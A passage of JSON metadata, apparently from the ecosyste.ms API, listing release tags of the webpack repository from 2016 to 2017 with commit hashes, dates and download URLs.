osts/GitHub/repositories/webpack%2Fwebpack/tags/v3.3.0/manifests"},{"name":"v2.7.0","sha":"eeea490e8ec0e2341cd4bb6da82aabf6ca139322","kind":"tag","published_at":"2017-07-12T07:00:17.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.7.0","html_url":"https://github.com/webpack/webpack/releases/tag/v2.7.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.7.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.7.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.7.0/manifests"},{"name":"v3.2.0","sha":"d0059901266e54a22309c419cad6d9327767c5a3","kind":"tag","published_at":"2017-07-11T20:09:42.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v3.2.0","html_url":"https://github.com/webpack/webpack/releases/tag/v3.2.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v3.2.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.2.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.2.0/manifests"},{"name":"v3.1.0","sha":"4bb3018da4310deaeff52b8a1c2b5645282b9994","kind":"tag","published_at":"2017-07-06T21:57:17.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v3.1.0","html_url":"https://github.com/webpack/webpack/releases/tag/v3.1.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v3.1.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.1.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.1.0/manifests"},{"name":"v3.0.0","sha":"bf4ec9c26e8f6de76c3d3ec1371f3ca1c8999ca5","kind":"tag","published_at":"2017-06-19T15:37:28.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v3.0.0","html_url":"https://github.com/webpack/webpack/releases/tag/v3.0.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v3.0.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.0.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.0.0/manifests"},{"name":"v3.0.0-rc.2","sha":"2ba04991056475509a4e45599a1f42e91cce6233","kind":"tag","published_at":"2017-06-14T21:46:00.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v3.0.0-rc.2","html_url":"https://github.com/webpack/webpack/releases/tag/v3.0.0-rc.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v3.0.0-rc.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.0.0-rc.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.0.0-rc.2/manifests"},{"name":"v3.0.0-rc.1","sha":"2e8b77ddcf66867b208dffce97fb94a87be48369","kind":"tag","published_at":"2017-06-07T11:33:58.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v3.0.0-rc.1","html_url":"https://github.com/webpack/webpack/releases/tag/v3.0.0-rc.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v3.0.0-rc.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.0.0-rc.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.0.0-rc.1/manifests"},{"name":"v3.0.0-rc.0","sha":"3d653290fafe385277b48e5a36807124618b9561","kind":"tag","published_at":"2017-06-05T14:12:24.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v3.0.0-rc.0","html_url":"https://github.com/webpack/webpack/releases/tag/v3.0.0-rc.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v3.0.0-rc.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.0.0-rc.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.0.0-rc.0/manifests"},{"name":"v2.6.1","sha":"7cfd2c490ea96c9676e8de54f2e7b6d1214722da","kind":"tag","published_at":"2017-05-25T11:16:17.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.6.1","html_url":"https://github.com/webpack/webpack/releases/tag/v2.6.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.6.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.6.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.6.1/manifests"},{"name":"v2.6.0","sha":"af05c147f24d3e7ee62e0c4102bb32c55e73b8d7","kind":"tag","published_at":"2017-05-22T20:38:28.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.6.0","html_url":"https://github.com/webpack/webpack/releases/tag/v2.6.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.6.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.6.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.6.0/manifests"},{"name":"v2.5.1","sha":"ad2f68f1f21602750ad891ea89a926806acbc95f","kind":"tag","published_at":"2017-05-06T20:07:11.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.5.1","html_url":"https://github.com/webpack/webpack/releases/tag/v2.5.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.5.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.5.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.5.1/manifests"},{"name":"v2.5.0","sha":"bf3652b16b65c27db5243aa0d674e2de4a8ccde9","kind":"tag","published_at":"2017-05-04T10:17:13.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.5.0","html_url":"https://github.com/webpack/webpack/releases/tag/v2.5.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.5.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.5.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.5.0/manifests"},{"name":"v2.4.1","sha":"bd753567da1248624beaaea14af31d6dbe303411","kind":"tag","published_at":"2017-04-14T13:34:34.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.4.1","html_url":"https://github.com/webpack/webpack/releases/tag/v2.4.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.4.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.4.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.4.1/manifests"},{"name":"v2.4.0","sha":"0cbd8fd1a05ee401b5feb95ba2b8edae31571d94","kind":"tag","published_at":"2017-04-14T11:42:58.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.4.0","html_url":"https://github.com/webpack/webpack/releases/tag/v2.4.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.4.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.4.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.4.0/manifests"},{"name":"v1.15.0","sha":"d4878a55be7a4b7ac4e5db1ae5eef89e15811072","kind":"tag","published_at":"2017-04-13T10:18:22.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.15.0","html_url":"https://github.com/webpack/webpack/releases/tag/v1.15.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.15.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.15.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.15.0/manifests"},{"name":"v2.3.3","sha":"ba24c1b163dc038ed738eb4a57dcb241bf63146d","kind":"tag","published_at":"2017-04-03T07:49:56.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.3.3","html_url":"https://github.com/webpack/webpack/releases/tag/v2.3.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.3.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.3.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.3.3/manifests"},{"name":"v2.3.2","sha":"6b209b13d76ec43080d6afbad4bb4dd6931e4638","kind":"tag","published_at":"2017-03-25T00:02:19.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.3.2","html_url":"https://github.com/webpack/webpack/releases/tag/v2.3.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.3.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.3.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.3.2/manifests"},{"name":"v2.3.1","sha":"4b9b660e8c4fe8ab6425014cb24dcec2d5df194b","kind":"tag","published_at":"2017-03-22T14:40:54.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.3.1","html_url":"https://github.com/webpack/webpack/releases/tag/v2.3.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.3.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.3.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.3.1/manifests"},{"name":"v2.3.0","sha":"46dc08e6317170a56df6c34adc8133dd6f70f1fa","kind":"tag","published_at":"2017-03-21T22:43:01.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.3.0","html_url":"https://github.com/webpack/webpack/releases/tag/v2.3.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.3.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.3.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.3.0/manifests"},{"name":"v2.2.1","sha":"0445b156d2c958536b72036e68ca6bde0ad32055","kind":"tag","published_at":"2017-01-30T21:13:05.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.2.1","html_url":"https://github.com/webpack/webpack/releases/tag/v2.2.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.2.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.2.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.2.1/manifests"},{"name":"v2.2.0","sha":"4be093d27942c25ec802a40268ed94e24d886b1d","kind":"tag","published_at":"2017-01-17T19:14:12.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.2.0","html_url":"https://github.com/webpack/webpack/releases/tag/v2.2.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.2.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.2.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.2.0/manifests"},{"name":"v2.2.0-rc.8","sha":"227846990cbc1a406bb61c5e6cafb3f3f38c8cdd","kind":"tag","published_at":"2017-01-17T18:46:01.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.2.0-rc.8","html_url":"https://github.com/webpack/webpack/releases/tag/v2.2.0-rc.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.2.0-rc.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.2.0-rc.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.2.0-rc.8/manifests"},{"name":"v2.2.0-rc.7","sha":"0b476022bbbddb206432e20b9c8bc5e91e592202","kind":"tag","published_at":"2017-01-16T15:01:49.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.2.0-rc.7","html_url":"https://github.com/webpack/webpack/releases/tag/v2.2.0-rc.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.2.0-rc.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.2.0-rc.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.2.0-rc.7/manifests"},{"name":"v2.2.0-rc.6","sha":"97966969b0c9e8425ecb1238deea979c6a18cb27","kind":"tag","published_at":"2017-01-16T02:48:21.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.2.0-rc.6","html_url":"https://github.com/webpack/webpack/releases/tag/v2.2.0-rc.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.2.0-rc.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.2.0-rc.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.2.0-rc.6/manifests"},{"name":"v2.2.0-rc.5","sha":"437dce4c8684f4295b5bb68a6ea5662c2660d780","kind":"tag","published_at":"2017-01-15T16:23:43.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.2.0-rc.5","html_url":"https://github.com/webpack/webpack/releases/tag/v2.2.0-rc.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.2.0-rc.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.2.0-rc.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.2.0-rc.5/manifests"},{"name":"v2.2.0-rc.4","sha":"f745f02910cb45a55ed659ebd99288e45a38e873","kind":"tag","published_at":"2017-01-11T15:42:18.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.2.0-rc.4","html_url":"https://github.com/webpack/webpack/releases/tag/v2.2.0-rc.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.2.0-rc.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.2.0-rc.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.2.0-rc.4/manifests"},{"name":"v2.2.0-rc.3","sha":"92a8be23614f92bc5669bf43eb0ddf746b2477e7","kind":"tag","published_at":"2016-12-28T15:03:38.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.2.0-rc.3","html_url":"https://github.com/webpack/webpack/releases/tag/v2.2.0-rc.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.2.0-rc.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.2.0-rc.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.2.0-rc.3/manifests"},{"name":"v2.2.0-rc.2","sha":"8369cc4c03767d7a76d1f7a047d11e71a550ddae","kind":"tag","published_at":"2016-12-22T10:51:18.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.2.0-rc.2","html_url":"https://github.com/webpack/webpack/releases/tag/v2.2.0-rc.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.2.0-rc.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.2.0-rc.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.2.0-rc.2/manifests"},{"name":"v2.2.0-rc.1","sha":"27e604e23100274a8887a5acf0008376d2617071","kind":"tag","published_at":"2016-12-17T08:09:32.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.2.0-rc.1","html_url":"https://github.com/webpack/webpack/releases/tag/v2.2.0-rc.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.2.0-rc.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.2.0-rc.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.2.0-rc.1/manifests"},{"name":"v2.2.0-rc.0","sha":"057814be1930cc4e8cee22c271823ea821ad067f","kind":"tag","published_at":"2016-12-14T21:32:21.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.2.0-rc.0","html_url":"https://github.com/webpack/webpack/releases/tag/v2.2.0-rc.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.2.0-rc.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.2.0-rc.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.2.0-rc.0/manifests"},{"name":"v2.1.0-beta.28","sha":"2e2eac70ab1ba648ef663b9b93fdedd7928672c4","kind":"tag","published_at":"2016-12-13T07:58:27.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.1.0-beta.28","html_url":"https://github.com/webpack/webpack/releases/tag/v2.1.0-beta.28","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.1.0-beta.28","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.28","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.28/manifests"},{"name":"v1.14.0","sha":"e666686d9029753c243db5880de44aba57151d76","kind":"tag","published_at":"2016-12-07T08:06:02.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.14.0","html_url":"https://github.com/webpack/webpack/releases/tag/v1.14.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.14.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.14.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.14.0/manifests"},{"name":"v2.1.0-beta.27","sha":"adaca2578cc3dcffbb2d0b639cb611a53f6da7c9","kind":"tag","published_at":"2016-11-15T19:00:47.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.1.0-beta.27","html_url":"https://github.com/webpack/webpack/releases/tag/v2.1.0-beta.27","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.1.0-beta.27","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.27","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.27/manifests"},{"name":"v2.1.0-beta.26","sha":"afbdff48ef2d5b304a41e72f4df8d51d629bc96f","kind":"tag","published_at":"2016-11-14T00:07:22.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.1.0-beta.26","html_url":"https://github.com/webpack/webpack/releases/tag/v2.1.0-beta.26","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.1.0-beta.26","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.26","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.26/manifests"},{"name":"v1.13.3","sha":"1a5fd7e8caeef794f67e56d9d734998209b0838c","kind":"commit","published_at":"2016-10-26T14:21:00.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.13.3","html_url":"https://github.com/webpack/webpack/releases/tag/v1.13.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.13.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.13.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.13.3/manifests"},{"name":"v2.1.0-beta.25","sha":"3029e5b1b1c486d7b3dd51e753d20bc25ceecd83","kind":"tag","published_at":"2016-09-21T18:31:13.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.1.0-beta.25","html_url":"https://github.com/webpack/webpack/releases/tag/v2.1.0-beta.25","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.1.0-beta.25","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.25","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.25/manifests"},{"name":"v2.1.0-beta.24","sha":"1c4597f1380ff6e5c7bf2f70c997d7ff52773f5b","kind":"tag","published_at":"2016-09-20T19:13:05.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.1.0-beta.24","html_url":"https://github.com/webpack/webpack/releases/tag/v2.1.0-beta.24","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.1.0-beta.24","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.24","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.24/manifests"},{"name":"v2.1.0-beta.23","sha":"8292d2f6597925d6d37fd78b91f0b5cd3798a362","kind":"tag","published_at":"2016-09-19T23:02:08.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.1.0-beta.23","html_url":"https://github.com/webpack/webpack/releases/tag/v2.1.0-beta.23","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.1.0-beta.23","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.23","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.23/manifests"},{"name":"v2.1.0-beta.22","sha":"f5d9a0901cb6b0cca8dcdbb5cd5a2d21de03fde1","kind":"tag","published_at":"2016-09-07T10:43:10.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.1.0-beta.22","html_url":"https://github.com/webpack/webpack/releases/tag/v2.1.0-beta.22","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.1.0-beta.22","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.22","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.22/manifests"},{"name":"v1.13.2","sha":"4b20545b375da82aa6418e6d498f01d543110af0","kind":"tag","published_at":"2016-08-18T08:31:36.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.13.2","html_url":"https://github.com/webpack/webpack/releases/tag/v1.13.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.13.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.13.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.13.2/manifests"},{"name":"v2.1.0-beta.21","sha":"c7cb6cb9d0d55b9f9185a8e9db02dcf97ac1c0de","kind":"tag","published_at":"2016-08-17T21:23:43.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.1.0-beta.21","html_url":"https://github.com/webpack/webpack/releases/tag/v2.1.0-beta.21","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.1.0-beta.21","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.21","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.21/manifests"},{"name":"v2.1.0-beta.20","sha":"b3a3ef3d4545fd1ae5e6abd678de96d4ebfcc5de","kind":"tag","published_at":"2016-07-20T22:41:14.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.1.0-beta.20","html_url":"https://github.com/webpack/webpack/releases/tag/v2.1.0-beta.20","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.1.0-beta.20","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.20","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.20/manifests"},{"name":"v2.1.0-beta.19","sha":"21a72529fa6af47185dc14f86b8d8de6dbcb6565","kind":"tag","published_at":"2016-07-17T22:49:23.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.1.0-beta.19","html_url":"https://github.com/webpack/webpack/releases/tag/v2.1.0-beta.19","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.1.0-beta.19","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.19","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.19/manifests"},{"name":"v2.1.0-beta.18","sha":"d826f99e342f7c0ae223a6837d98d2f648780a09","kind":"tag","published_at":"2016-07-15T21:26:36.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.1.0-beta.18","html_url":"https://github.com/webpack/webpack/releases/tag/v2.1.0-beta.18","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.1.0-beta.18","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.18","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.18/manifests"},{"name":"v2.1.0-beta.17","sha":"bc29455e92f4b760db745775a4fca5cde0d01d23","kind":"tag","published_at":"2016-07-13T12:04:51.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.1.0-beta.17","html_url":"https://github.com/webpack/webpack/releases/tag/v2.1.0-beta.17","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.1.0-beta.17","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.17","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.17/manifests"},{"name":"v2.1.0-beta.16","sha":"90d537ef4ce1092f76bd02ee2a75838c67b809fc","kind":"tag","published_at":"2016-07-13T09:11:53.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.1.0-beta.16","html_url":"https://github.com/webpack/webpack/releases/tag/v2.1.0-beta.16","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.1.0-beta.16","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.16","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repos